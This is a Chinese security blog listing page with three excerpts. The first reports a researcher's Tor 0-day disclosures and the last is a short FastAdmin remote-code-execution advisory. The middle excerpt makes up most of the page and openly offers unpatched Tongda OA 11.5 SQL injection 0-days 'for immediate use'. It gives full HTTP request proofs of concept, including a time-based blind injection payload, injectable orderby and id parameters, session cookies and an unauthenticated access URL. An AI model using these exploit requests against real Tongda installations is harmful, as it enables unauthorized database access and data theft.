2020-10-23
暗网曝出两个0day漏洞,直接暗网获取访问者真实IP

暗网曝出两个0day漏洞,直接暗网获取访问者真实IP

来源:墙头说安全 一位安全研究人员发布了有关两个Tor 0day漏洞的详细信息,并计划发布另外三个漏洞。 安全研究员Neal Krawetz博士在过去一周中发布了有关两个Tor 0day漏洞的技术细节,并承诺将再发布三个。政府可以利用这些Tor零时差漏洞来阻止用户访问流行的匿名网络。 专家确认,这三个新问题之一可以使Tor服务器不匿名,从而揭示其真实IP地址。 “我放弃了向Tor Project报告错误。Tor有需要解决的严重问题,他们了解许多问题,因此拒绝采取任何措施。 我正在推迟放送Tor 0days,直到抗议结束为止。(即使有bug,我们现在也需要Tor。)抗议活动开始后0天。”-Neal Krawetz博士(@hackerfactor) Neal Krawetz博士决定公开披露有关两个零日漏洞的详细信息,因为Tor项目一再未能解决他在过去几年中报告的多个漏洞。 研究人员还承诺再透露至少三个Tor 0-day,其中一个可以显示Tor服务器的真实IP地址。 研究人员操作多个Tor节点,上周他发表了一篇博客文章,描述了互联网服务提供商和组织如何停止Tor连接。 “但是,如果每个Tor节点提供了一个可用于检测Tor网络连接的独特数据包签名怎么办?然后,您可以设置过滤器以查找签名并停止所有Tor连接。事实证明,这种数据包签名不是理论上的。” 攻击者可能使用数据包签名来阻止Tor连接的启动。 今天,专家发表了一篇新的博客文章,其中提供了有关其他Tor零时差问题的详细信息,攻击者可能会利用这些零日问题来检测间接连接,“直接连接到Tor网络是最常见的连接类型。但是,也有间接方法连接到Tor网络。这些间接方法称为“桥梁”。 如果有人可以检测到每个网桥协议,那么每个Tor用户都将被阻止访问Tor网络,或者可以对其进行直接监视。(如果他们知道您的真实网络地址,那么他们就会知道您是谁,他们可以监视或审查您的活动。)”阅读报告。 “在此博客文章中,我将披露识别Tor桥网络流量的方法。这包括两个新的零日(0day)漏洞-一个用于检测obfs4,另一个用于检测温顺。”Tor桥(“Tor桥继电器”)是Tor网络的替代入口点,其中一些未公开列出。使用网桥会使ISP很难(但并非不可能)确定用户正在连接到Tor。 根据Krawetz博士的说法,攻击者可以轻松地检测到与跟踪特定数据包的Tor桥的连接。 “在我之前的博客条目和此博客条目之间,您现在拥有使用实时的有状态数据包检查系统来实施策略所需的一切。无论用户是直接连接还是使用网桥,您都可以阻止所有用户连接到Tor网络。” Krawetz博士继续说道。安全研究人员向Tor项目报告了多个问题,但他声称维护人员从未解决过这些问题,因此,Krawetz博士决定中断与该组织的合作。 ...
网络安全 2170次浏览 0条评论
2020-10-23
全网首发通达OA多枚0day漏洞分享

全网首发通达OA多枚0day漏洞分享

之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是未正式公开的。 影响范围: 我测试的是通达OA11.5版本,也就是2020年04月17日发布的,其他版未测,但我想也会有吧。 HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就能找到。 解密后,对代码的各个模块都大致看了一下,很快就发现多处都存在SQL注入漏洞,仔细看了之前的曝光的文章,发现这些漏洞并未曝光,也未预警,也属于0day漏洞吧。 不多说,直接上POC,有需要的可以先拿到用了。 0x001 SQL注入 POC: POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Referer: http://192.168.202.1/portal/home/ Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff Connection: keep-alive Host: 192.168.43.169 Pragma: no-cache X-Requested-With: XMLHttpRequest Content-Length: 154 X-WVS-ID: Acunetix-Autologin/65535 Cache-Control: no-cache Accept: */* Origin: http://192.168.43.169 Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1 漏洞文件: webrootgeneralappbuildermodulescalendarmodelsCalendar.php get_callist_data函数接收传入的begin_date变量未经过滤直接拼接在查询语句中造成注入。 利用条件: 一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。 0x002 SQL注入 POC: 漏洞参数:orderby GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.43.169/ Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: 192.168.43.169 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Connection: close 漏洞文件:webrootincutility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入 利用条件: 一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。 0x003 SQL注入 POC: 漏洞参数:orderby GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.43.169 Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: 192.168.43.169 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Connection: close 漏洞文件:webrootincutility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。 利用条件: 一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。 0x004 SQL注入 POC: 漏洞参数:id GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.43.169 Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: 192.168.43.169 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Connection: close 漏洞文件: webrootgeneralappbuildermodulesreportcontrollersRepdetailController.php,actionEdit函数中存在 一个$_GET["id"];  未经过滤,拼接到SQL查询中,造成了SQL注入。 利用条件: 一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入。 0x005 未授权访问:  未授权访问各种会议通知信息,POC链接: http://127.0.0.1/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay ...
网络安全 1690次浏览 0条评论
2020-10-23
FastAdmin被曝远程代码执行0day漏洞

FastAdmin被曝远程代码执行0day漏洞

漏洞描述 FastAdmin是深圳极速创想科技有限公司开发的一款基于ThinkPHP和Bootstrap的后台开发框架、开放会员中心的站点。9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,上传特定文件可直接GetShell,风险极大。该漏洞为0day漏洞,截止目前尚未修复。 漏洞编号 暂无 风险等级 严重 影响版本 V1.0.0.20180911_beta - V1.0.0.20200506_beta 修复建议 建议更新至官方最新版本。 https://www.fastadmin.net/news/83.html 情报来源 https://github.com/karsonzhang/fastadmin/issues/73 https://www.fastadmin.net/news/83.html ...
网络安全 1550次浏览 0条评论
微信二维码